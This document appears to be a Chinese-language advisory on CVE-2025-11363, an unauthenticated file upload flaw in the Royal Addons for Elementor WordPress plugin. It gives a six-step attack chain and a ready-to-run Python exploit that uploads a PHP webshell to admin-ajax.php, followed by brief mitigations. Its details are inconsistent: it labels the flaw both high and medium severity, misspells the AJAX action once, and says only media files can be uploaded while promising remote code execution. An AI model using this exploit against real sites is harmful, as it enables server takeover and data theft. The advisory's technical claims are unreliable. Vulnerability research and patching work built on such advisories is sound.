CVE-2025-11363: Royal Addons for Elementor插件未授权文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-11363

漏洞类型

授权绕过/不安全的直接对象引用(IDOR)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Royal Addons for Elementor (WordPress插件)

漏洞概述

CVE-2025-11363是WordPress插件Royal Addons for Elementor中的一个高危安全漏洞。该插件在1.7.1037之前的版本存在严重的授权缺陷，具体表现为缺少对wpr_addtons_upload_file操作的适当权限验证。攻击者无需任何认证凭证，即可利用该漏洞向服务器上传任意媒体文件。此漏洞的CVSS评分为5.3，属于中等严重程度，攻击复杂度低且无需用户交互。由于该插件广泛用于WordPress网站以增强Elementor页面构建器的功能，因此受影响的网站数量可能非常庞大。攻击者可以利用此漏洞上传恶意文件，进一步实施网站篡改、恶意代码植入或供应链攻击。

技术细节

漏洞根源在于Royal Addons for Elementor插件的wpr_addons_upload_file AJAX操作函数未实施有效的用户身份验证和权限检查。该函数直接处理文件上传请求，未验证请求者是否具有管理员权限或已登录。攻击者可以通过构造恶意HTTP POST请求，指定目标文件内容和文件名，利用WordPress的wp_upload_bits或类似函数将文件写入服务器的上传目录。攻击者通常会上传包含PHP代码的恶意文件（如webshell），然后通过直接访问该文件路径来执行任意代码，实现服务器完全沦陷。建议管理员检查wp-content/uploads/目录中是否存在可疑的.php或其他可执行文件。

攻击链分析

STEP 1

步骤1

攻击者识别使用Royal Addons for Elementor插件的WordPress网站

STEP 2

步骤2

构造恶意HTTP POST请求到wp-admin/admin-ajax.php，包含action=wpr_addons_upload_file参数

STEP 3

步骤3

在请求中附加恶意文件（如包含PHP代码的webshell）

STEP 4

步骤4

服务器端插件处理上传请求，由于缺少授权检查，文件被写入uploads目录

STEP 5

步骤5

攻击者通过直接访问上传的恶意文件路径执行任意代码

STEP 6

步骤6

获取服务器完全控制权，可进行数据窃取、持久化控制或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-11363 PoC - Unauthenticated File Upload
# Royal Addons for Elementor < 1.7.1037

def exploit(target_url, file_content='<?php echo "PWNED"; ?>'):
    """
    Exploit for CVE-2025-11363: Unauthenticated file upload in Royal Addons for Elementor
    """
    target = target_url.rstrip('/')
    
    # Prepare malicious file
    files = {
        'file': ('shell.php', file_content, 'application/x-php')
    }
    
    # Send upload request via AJAX action
    data = {
        'action': 'wpr_addons_upload_file',
        'path': '../../uploads/'
    }
    
    try:
        response = requests.post(
            f'{target}/wp-admin/admin-ajax.php',
            files=files,
            data=data,
            timeout=10
        )
        
        if response.status_code == 200:
            print(f'[+] Request sent successfully')
            print(f'[+] Response: {response.text}')
            # Check for uploaded file path in response
            if 'uploads' in response.text or response.json():
                print('[+] File may have been uploaded')
                return True
        else:
            print(f'[-] Request failed with status: {response.status_code}')
            return False
            
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: python {sys.argv[0]} <target_url>')
        sys.exit(1)
    exploit(sys.argv[1])

影响范围

Royal Addons for Elementor < 1.7.1037

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1) 在wp-config.php中添加代码禁用wpr_addons_upload_file AJAX操作；2) 通过.htaccess规则阻止直接访问uploads目录中的.php文件；3) 使用WordPress防火墙插件临时拦截可疑上传行为；4) 定期检查wp-content/uploads/目录是否存在异常文件并及时清除。